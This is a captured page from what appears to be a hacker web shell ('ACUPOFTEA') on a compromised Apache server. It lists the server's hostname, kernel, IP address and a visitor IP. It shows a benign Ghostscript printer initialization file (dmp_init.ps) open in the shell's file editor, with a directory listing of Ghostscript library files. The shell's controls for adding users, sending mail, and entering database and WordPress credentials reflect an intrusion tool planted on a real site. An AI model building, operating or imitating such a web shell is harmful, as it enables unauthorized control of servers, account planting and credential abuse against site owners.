System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
share
/
ghostscript
/
lib
/
216.73.216.5
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for accounting.gulfstore-gcc.com made by tabagkayu.
Folder Name
File Name
File Content
File
dmp_init.ps
%! % Copyright (C) 1989, 1992, 1993 Aladdin Enterprises. All rights reserved. % % This file is part of Ghostscript. % % Ghostscript is distributed in the hope that it will be useful, but % WITHOUT ANY WARRANTY. No author or distributor accepts responsibility % to anyone for the consequences of using it or for whether it serves any % particular purpose or works at all, unless he says so in writing. Refer % to the Ghostscript General Public License for full details. % % Everyone is granted permission to copy, modify and redistribute % Ghostscript, but only under the conditions described in the Ghostscript % General Public License. A copy of this license is supposed to have been % given to you along with Ghostscript so you can know your rights and % responsibilities. It should be in a file named COPYING. Among other % things, the copyright notice and this notice must be preserved on all % copies. % dmp_init.ps % Initialization file for `dmprt' device driver. % % Written initial version by... ASAYAMA Kazunori 1993 Nov. % Modified for Ghostscript 4.03 by ... ASAYAMA Kazunori 1997 May. %%%%% check version %%%%% 201 % version of this initialization file. /dmprt finddevice { /DmprtParams gsgetdeviceprop /Version get } stopped { pop pop 0 } if 2 copy ne { (\ndmprt: driver version\() print dup 0 eq {pop (unknown) print }{==only}ifelse (\) does not match dmp_init.ps version\() print ==only (\).\n) print flush 1 .quit } { pop pop } ifelse %%%%% BODY %%%%% 40 dict begin % .WorkDict .UserParams % .DmprtDevice % .GetDmprtParam .SetDmprtParam % .DmprtParams .Xdpi .Ydpi .Xdot .Ydot % % in cm mm pt bp dot % BeginMode EndMode % .ModeDataBase .CurrentMode % BeginConfig EndConfig % BeginPrinterProps EndPrinterProps /.WorkDict currentdict def /.ModeDataBase 10 dict def /.dicttomark { counttomark 2 idiv dup dict begin { def } repeat pop currentdict end } bind def %%%%% utilities for user customization. %%%%% /in { } bind def /cm { 2.54 div } bind def /mm { 25.4 div } bind def /pt { 72.27 div } bind def /bp { 72.0 div } bind def /dot { [ exch truncate cvi ] } bind def % the database of user customizations. (not implemented yet.) /BeginMode { % <name> -> <name> mark mark } bind def /EndMode { % <name> mark <item1> <value1> ... <itemN> <valueN> -> -- .dicttomark .ModeDataBase dup dup maxlength exch length eq { % Expand capacity of database dictionaly. dup maxlength 10 add dict copy dup /.ModeDataBase exch def } if 3 1 roll put } bind def % these procedures are undocumented in the user's manual. % these are used in order to specify the propaties directly. /BeginPrinterProps { [ } bind def /EndPrinterProps { ] /printer exch } bind def %%%%% run the user customization file. %%%%% /BeginConfig mark def /EndConfig { .dicttomark /.UserParams exch def } bind def systemdict /DMPCONFIG 2 copy known { get run } % -sDMPCONFIG=<filename> { pop pop (dmp_site.ps) findlibfile { closefile run } if } ifelse %%%%% refer database %%%%% /.UsedMode .ModeDataBase length dict def /.ExpandUserParams { % <dict> -> <param1> <value1> ... <paramN> <valueN> /.InheritMode null def { 1 index /inherit eq { exch pop dup .UsedMode exch known { % check recursive reference. /.ExpandUserParams /rangecheck signalerror } if /.InheritMode exch def } if } forall .InheritMode type /nametype eq { .UsedMode .InheritMode true put .ModeDataBase .InheritMode get .ExpandUserParams } if } bind def systemdict /DMPMODE 2 copy known {get .ModeDataBase exch get} {pop pop .UserParams} ifelse mark exch .ExpandUserParams .dicttomark /.UserParams exch def %%%%% Local variables and procedures. %%%%% /.DmprtDevice /dmprt finddevice def /.SetDmprtParam { % <key> <value> -> -- .DmprtParams 3 1 roll put } bind def /.SetLocalParam { .LocalParams 3 1 roll put } bind def /.GetDmprtParam { % <key> -> <value> .DmprtParams exch get } bind def /.GetUserParam { % <key> <default-value> -> <value> .UserParams 3 -1 roll 2 copy known {get exch pop}{pop pop} ifelse } bind def /.SetUserParam { % <prop-name> <key> <default-value> -> -- .GetUserParam .SetDmprtParam } bind def %%%%% dviprt proparties %%%%% mark .UserParams /printer 2 copy known { get dup type /dicttype ne { mark /FileName 3 -1 roll .dicttomark } if } { pop pop % Default printer is `ESC/P 24 pins'. mark /Name (ESC/P 24 pins) /Transpose true /Reverse false /NonMoving false /Encoding (Null) /HDpi 180 /VDpi 180 /Pins 24 /MinimalUnit 1 /MaximalUnit 180 /Constant 1 /BitImageMode (\007\0333\030\033?Z\047) /NormalMode (\004\015\014\0332) /SendBitImage (\002\033Z\002\001\200) /SkipSpaces (\002\033\\\002\001\200) /LineFeed (\002\015\012) /FormFeed (\002\015\014) /AfterBitImage () /BitRowHeader () .dicttomark } ifelse /DviprtParams exch .DmprtDevice putdeviceprops getdeviceprops .dicttomark /.DmprtParams exch def .DmprtParams /DviprtParams get /.DviprtParams exch def .DmprtParams /DmprtParams get /.LocalParams exch def % calcurate resolutions and define operators converting % from user-coordination to device-coordination(count by dots). /resolution [ .DviprtParams dup /HDpi get exch /VDpi get ] .GetUserParam {} forall /.Ydpi exch def /.Xdpi exch def /.Xdot { dup type /arraytype eq { 0 get } { .Xdpi mul truncate cvi } ifelse } bind def /.Ydot { dup type /arraytype eq { 0 get } { .Ydpi mul truncate cvi } ifelse } bind def %%%%% Standard Ghostscript device propaties. %%%%% /HWSize % default is A4. /defaultsize [8.3 11.7] .GetUserParam [ exch dup 0 get .Xdot exch 1 get .Ydot ] .SetDmprtParam %%%%% dmprt device propaties. %%%%% /MaxSize /maxsize [0.0 0.0] .GetUserParam [ exch dup 0 get .Xdot exch 1 get .Ydot ] .SetLocalParam /Margins /margin [0.0 0.0 0.0 0.0] .GetUserParam [ exch dup 0 get .Xdot exch dup 1 get .Ydot exch dup 2 get .Xdot exch 3 get .Ydot ] .SetLocalParam /Verbose QUIET {false} {/verbose false .GetUserParam} ifelse .SetLocalParam /Debug /debug false .GetUserParam .SetLocalParam %%%%% Page device propaties. %%%%% %%%%% See PostScript Reference Manual 2nd edition. %%%%% /HWResolution [ .Xdpi .Ydpi ] .SetDmprtParam /Offsets /offset [0.0 0.0] .GetUserParam [ exch dup 0 get .Xdot exch 1 get .Ydot ] .SetLocalParam %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% mark .DmprtParams {} forall .DmprtDevice putdeviceprops pop end %%%%%%%%%%%%%%%%%%%%%%%%%%%% End of file %%%%%%%%%%%%%%%%%%%%%%%%%%%
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-06-03 10:58:50
..
DIR
-
drwxr-xr-x
2025-06-03 02:48:16
PDFA_def.ps
application/postscript
1.25 KB
-rw-r--r--
2025-06-03 02:48:11
PDFX_def.ps
application/postscript
1.77 KB
-rw-r--r--
2025-06-03 02:48:11
PM760p.upp
text/plain
1.13 KB
-rw-r--r--
2025-06-03 02:48:15
PM760pl.upp
text/plain
1.1 KB
-rw-r--r--
2025-06-03 02:48:15
PM820p.upp
text/plain
1.12 KB
-rw-r--r--
2025-06-03 02:48:15
PM820pl.upp
text/plain
1.09 KB
-rw-r--r--
2025-06-03 02:48:15
Stc670p.upp
text/plain
1.13 KB
-rw-r--r--
2025-06-03 02:48:15
Stc670pl.upp
text/plain
1.1 KB
-rw-r--r--
2025-06-03 02:48:15
Stc680p.upp
text/plain
1.11 KB
-rw-r--r--
2025-06-03 02:48:15
Stc680pl.upp
text/plain
1.09 KB
-rw-r--r--
2025-06-03 02:48:15
Stc740p.upp
text/plain
1.01 KB
-rw-r--r--
2025-06-03 02:48:15
Stc740pl.upp
text/plain
1.09 KB
-rw-r--r--
2025-06-03 02:48:15
Stc760p.upp
text/plain
1.11 KB
-rw-r--r--
2025-06-03 02:48:15
Stc760pl.upp
text/plain
1.09 KB
-rw-r--r--
2025-06-03 02:48:15
Stc777p.upp
text/plain
1.11 KB
-rw-r--r--
2025-06-03 02:48:15
Stc777pl.upp
text/plain
1.09 KB
-rw-r--r--
2025-06-03 02:48:15
Stp720p.upp
text/plain
1.13 KB
-rw-r--r--
2025-06-03 02:48:15
Stp720pl.upp
text/plain
1.09 KB
-rw-r--r--
2025-06-03 02:48:15
Stp870p.upp
text/plain
1.11 KB
-rw-r--r--
2025-06-03 02:48:15
Stp870pl.upp
text/plain
1.09 KB
-rw-r--r--
2025-06-03 02:48:15
acctest.ps
application/postscript
4.17 KB
-rw-r--r--
2025-06-03 02:48:11
align.ps
text/plain
2.11 KB
-rw-r--r--
2025-06-03 02:48:11
bj8.rpd
text/plain
639 B
-rw-r--r--
2025-06-03 02:48:12
bj8gc12f.upp
text/plain
1.5 KB
-rw-r--r--
2025-06-03 02:48:12
bj8hg12f.upp
text/plain
1.5 KB
-rw-r--r--
2025-06-03 02:48:12
bj8oh06n.upp
text/plain
1.48 KB
-rw-r--r--
2025-06-03 02:48:12
bj8pa06n.upp
text/plain
1.49 KB
-rw-r--r--
2025-06-03 02:48:12
bj8pp12f.upp
text/plain
1.51 KB
-rw-r--r--
2025-06-03 02:48:12
bj8ts06n.upp
text/plain
1.49 KB
-rw-r--r--
2025-06-03 02:48:12
bjc6000a1.upp
text/plain
1.62 KB
-rw-r--r--
2025-06-03 02:48:15
bjc6000b1.upp
text/plain
1.62 KB
-rw-r--r--
2025-06-03 02:48:15
bjc610a0.upp
text/plain
1.49 KB
-rw-r--r--
2025-06-03 02:48:12
bjc610a1.upp
text/plain
1.48 KB
-rw-r--r--
2025-06-03 02:48:12
bjc610a2.upp
text/plain
1.48 KB
-rw-r--r--
2025-06-03 02:48:12
bjc610a3.upp
text/plain
1.49 KB
-rw-r--r--
2025-06-03 02:48:12
bjc610a4.upp
text/plain
1.49 KB
-rw-r--r--
2025-06-03 02:48:12
bjc610a5.upp
text/plain
1.48 KB
-rw-r--r--
2025-06-03 02:48:12
bjc610a6.upp
text/plain
1.48 KB
-rw-r--r--
2025-06-03 02:48:12
bjc610a7.upp
text/plain
1.48 KB
-rw-r--r--
2025-06-03 02:48:12
bjc610a8.upp
text/plain
1.49 KB
-rw-r--r--
2025-06-03 02:48:12
bjc610b1.upp
text/plain
1.48 KB
-rw-r--r--
2025-06-03 02:48:12
bjc610b2.upp
text/plain
1.48 KB
-rw-r--r--
2025-06-03 02:48:12
bjc610b3.upp
text/plain
1.49 KB
-rw-r--r--
2025-06-03 02:48:12
bjc610b4.upp
text/plain
1.49 KB
-rw-r--r--
2025-06-03 02:48:12
bjc610b6.upp
text/plain
1.48 KB
-rw-r--r--
2025-06-03 02:48:12
bjc610b7.upp
text/plain
1.49 KB
-rw-r--r--
2025-06-03 02:48:12
bjc610b8.upp
text/plain
1.49 KB
-rw-r--r--
2025-06-03 02:48:12
caption.ps
application/postscript
1.72 KB
-rw-r--r--
2025-06-03 02:48:11
cbjc600.ppd
text/plain
10.89 KB
-rw-r--r--
2025-06-03 02:48:11
cbjc800.ppd
text/plain
11.22 KB
-rw-r--r--
2025-06-03 02:48:12
cdj550.upp
text/plain
1.65 KB
-rw-r--r--
2025-06-03 02:48:12
cdj690.upp
text/plain
1.95 KB
-rw-r--r--
2025-06-03 02:48:12
cdj690ec.upp
text/plain
2.01 KB
-rw-r--r--
2025-06-03 02:48:12
cid2code.ps
text/plain
4.39 KB
-rw-r--r--
2025-06-03 02:48:11
dmp_init.ps
application/postscript
7.08 KB
-rw-r--r--
2025-06-03 02:48:15
dmp_site.ps
application/postscript
459 B
-rw-r--r--
2025-06-03 02:48:15
dnj750c.upp
text/plain
2.74 KB
-rw-r--r--
2025-06-03 02:48:12
dnj750m.upp
text/plain
1.93 KB
-rw-r--r--
2025-06-03 02:48:12
docie.ps
text/plain
7.32 KB
-rw-r--r--
2025-06-03 02:48:11
escp_24.src
text/plain
350 B
-rw-r--r--
2025-06-03 02:48:15
font2pcl.ps
text/plain
18.01 KB
-rw-r--r--
2025-06-03 02:48:11
ghostpdf.ppd
text/plain
25.04 KB
-rw-r--r--
2025-06-03 02:48:12
gs_ce_e.ps
text/plain
2.17 KB
-rw-r--r--
2025-06-03 02:48:11
gs_il2_e.ps
text/plain
2.57 KB
-rw-r--r--
2025-06-03 02:48:11
gs_kanji.ps
text/plain
3.91 KB
-rw-r--r--
2025-06-03 02:48:11
gs_ksb_e.ps
text/plain
3.07 KB
-rw-r--r--
2025-06-03 02:48:11
gs_l.xbm
text/plain
1.9 KB
-rw-r--r--
2025-06-03 02:48:12
gs_l.xpm
image/x-xpixmap
2.69 KB
-rw-r--r--
2025-06-03 02:48:12
gs_l_m.xbm
text/plain
1.91 KB
-rw-r--r--
2025-06-03 02:48:12
gs_lgo_e.ps
text/plain
2.67 KB
-rw-r--r--
2025-06-03 02:48:11
gs_lgx_e.ps
text/plain
1.72 KB
-rw-r--r--
2025-06-03 02:48:11
gs_m.xbm
text/plain
945 B
-rw-r--r--
2025-06-03 02:48:12
gs_m.xpm
image/x-xpixmap
1.4 KB
-rw-r--r--
2025-06-03 02:48:12
gs_m_m.xbm
text/plain
955 B
-rw-r--r--
2025-06-03 02:48:12
gs_s.xbm
text/plain
594 B
-rw-r--r--
2025-06-03 02:48:12
gs_s.xpm
image/x-xpixmap
957 B
-rw-r--r--
2025-06-03 02:48:12
gs_s_m.xbm
text/plain
604 B
-rw-r--r--
2025-06-03 02:48:12
gs_t.xbm
text/plain
345 B
-rw-r--r--
2025-06-03 02:48:12
gs_t.xpm
image/x-xpixmap
605 B
-rw-r--r--
2025-06-03 02:48:12
gs_t_m.xbm
text/plain
355 B
-rw-r--r--
2025-06-03 02:48:12
gs_wl1_e.ps
text/plain
2.44 KB
-rw-r--r--
2025-06-03 02:48:11
gs_wl2_e.ps
text/plain
2.44 KB
-rw-r--r--
2025-06-03 02:48:11
gs_wl5_e.ps
text/plain
2.45 KB
-rw-r--r--
2025-06-03 02:48:11
gslp.ps
text/plain
20.24 KB
-rw-r--r--
2025-06-03 02:48:11
gsnup.ps
application/postscript
2.57 KB
-rw-r--r--
2025-06-03 02:48:11
ht_ccsto.ps
application/postscript
222.8 KB
-rw-r--r--
2025-06-03 02:48:11
image-qa.ps
application/postscript
71.34 KB
-rw-r--r--
2025-06-03 02:48:11
jispaper.ps
text/plain
784 B
-rw-r--r--
2025-06-03 02:48:11
landscap.ps
application/postscript
1.43 KB
-rw-r--r--
2025-06-03 02:48:11
lines.ps
application/postscript
3.65 KB
-rw-r--r--
2025-06-03 02:48:11
mkcidfm.ps
text/plain
21.8 KB
-rw-r--r--
2025-06-03 02:48:11
necp2x.upp
text/plain
1.02 KB
-rw-r--r--
2025-06-03 02:48:12
necp2x6.upp
text/plain
1.04 KB
-rw-r--r--
2025-06-03 02:48:12
pdf2dsc.ps
text/plain
7.87 KB
-rw-r--r--
2025-06-03 02:48:11
pf2afm.ps
application/postscript
14.94 KB
-rw-r--r--
2025-06-03 02:48:11
pfbtopfa.ps
text/plain
996 B
-rw-r--r--
2025-06-03 02:48:11
ppath.ps
text/plain
1.78 KB
-rw-r--r--
2025-06-03 02:48:11
pphs.ps
text/plain
6.68 KB
-rw-r--r--
2025-06-03 02:48:11
prfont.ps
application/postscript
7.04 KB
-rw-r--r--
2025-06-03 02:48:11
printafm.ps
application/postscript
4.78 KB
-rw-r--r--
2025-06-03 02:48:11
ps2ai.ps
application/postscript
21.78 KB
-rw-r--r--
2025-06-03 02:48:11
ps2epsi.ps
text/plain
8.34 KB
-rw-r--r--
2025-06-03 02:48:11
ras1.upp
text/plain
215 B
-rw-r--r--
2025-06-03 02:48:12
ras24.upp
text/plain
219 B
-rw-r--r--
2025-06-03 02:48:12
ras3.upp
text/plain
214 B
-rw-r--r--
2025-06-03 02:48:12
ras32.upp
text/plain
196 B
-rw-r--r--
2025-06-03 02:48:12
ras4.upp
text/plain
220 B
-rw-r--r--
2025-06-03 02:48:12
ras8m.upp
text/plain
209 B
-rw-r--r--
2025-06-03 02:48:12
rollconv.ps
application/postscript
12.23 KB
-rw-r--r--
2025-06-03 02:48:11
s400a1.upp
text/plain
1.42 KB
-rw-r--r--
2025-06-03 02:48:15
s400b1.upp
text/plain
1.57 KB
-rw-r--r--
2025-06-03 02:48:15
sharp.upp
text/plain
1.89 KB
-rw-r--r--
2025-06-03 02:48:15
sipixa6.upp
text/plain
529 B
-rw-r--r--
2025-06-03 02:48:15
st640ih.upp
text/plain
2.23 KB
-rw-r--r--
2025-06-03 02:48:12
st640ihg.upp
text/plain
1.47 KB
-rw-r--r--
2025-06-03 02:48:12
st640p.upp
text/plain
1.87 KB
-rw-r--r--
2025-06-03 02:48:12
st640pg.upp
text/plain
1.11 KB
-rw-r--r--
2025-06-03 02:48:12
st640pl.upp
text/plain
1.83 KB
-rw-r--r--
2025-06-03 02:48:12
st640plg.upp
text/plain
1.08 KB
-rw-r--r--
2025-06-03 02:48:12
stc.upp
text/plain
1.88 KB
-rw-r--r--
2025-06-03 02:48:12
stc1520h.upp
text/plain
2.1 KB
-rw-r--r--
2025-06-03 02:48:12
stc2.upp
text/plain
1.86 KB
-rw-r--r--
2025-06-03 02:48:12
stc200_h.upp
text/plain
1.8 KB
-rw-r--r--
2025-06-03 02:48:12
stc2_h.upp
text/plain
1.83 KB
-rw-r--r--
2025-06-03 02:48:12
stc2s_h.upp
text/plain
2.22 KB
-rw-r--r--
2025-06-03 02:48:12
stc300.upp
text/plain
2.09 KB
-rw-r--r--
2025-06-03 02:48:12
stc300bl.upp
text/plain
1.31 KB
-rw-r--r--
2025-06-03 02:48:12
stc300bm.upp
text/plain
1.4 KB
-rw-r--r--
2025-06-03 02:48:12
stc500p.upp
text/plain
1.86 KB
-rw-r--r--
2025-06-03 02:48:12
stc500ph.upp
text/plain
1.86 KB
-rw-r--r--
2025-06-03 02:48:12
stc600ih.upp
text/plain
2.23 KB
-rw-r--r--
2025-06-03 02:48:12
stc600p.upp
text/plain
1.12 KB
-rw-r--r--
2025-06-03 02:48:12
stc600pl.upp
text/plain
1.09 KB
-rw-r--r--
2025-06-03 02:48:12
stc640p.upp
text/plain
1.07 KB
-rw-r--r--
2025-06-03 02:48:12
stc740ih.upp
text/plain
2.07 KB
-rw-r--r--
2025-06-03 02:48:15
stc800ih.upp
text/plain
2.11 KB
-rw-r--r--
2025-06-03 02:48:12
stc800p.upp
text/plain
1.09 KB
-rw-r--r--
2025-06-03 02:48:12
stc800pl.upp
text/plain
1.07 KB
-rw-r--r--
2025-06-03 02:48:12
stc_h.upp
text/plain
1.87 KB
-rw-r--r--
2025-06-03 02:48:12
stc_l.upp
text/plain
734 B
-rw-r--r--
2025-06-03 02:48:12
stcany.upp
text/plain
673 B
-rw-r--r--
2025-06-03 02:48:12
stcany_h.upp
text/plain
681 B
-rw-r--r--
2025-06-03 02:48:12
stcinfo.ps
text/plain
24.92 KB
-rw-r--r--
2025-06-03 02:48:11
stcolor.ps
text/plain
4.95 KB
-rw-r--r--
2025-06-03 02:48:11
stocht.ps
text/plain
2.44 KB
-rw-r--r--
2025-06-03 02:48:11
traceimg.ps
text/plain
1.35 KB
-rw-r--r--
2025-06-03 02:48:11
traceop.ps
text/plain
2.51 KB
-rw-r--r--
2025-06-03 02:48:11
uninfo.ps
application/postscript
5.85 KB
-rw-r--r--
2025-06-03 02:48:11
viewcmyk.ps
text/plain
1.94 KB
-rw-r--r--
2025-06-03 02:48:11
viewgif.ps
text/plain
5.27 KB
-rw-r--r--
2025-06-03 02:48:11
viewjpeg.ps
application/postscript
5.56 KB
-rw-r--r--
2025-06-03 02:48:11
viewmiff.ps
text/plain
4.15 KB
-rw-r--r--
2025-06-03 02:48:11
viewpbm.ps
text/plain
10.04 KB
-rw-r--r--
2025-06-03 02:48:11
viewpcx.ps
text/plain
5.11 KB
-rw-r--r--
2025-06-03 02:48:11
viewps2a.ps
text/plain
1.11 KB
-rw-r--r--
2025-06-03 02:48:11
winmaps.ps
text/plain
3.52 KB
-rw-r--r--
2025-06-03 02:48:11
zeroline.ps
application/postscript
2.26 KB
-rw-r--r--
2025-06-03 02:48:11
~ ACUPOFTEA - accounting.gulfstore-gcc.com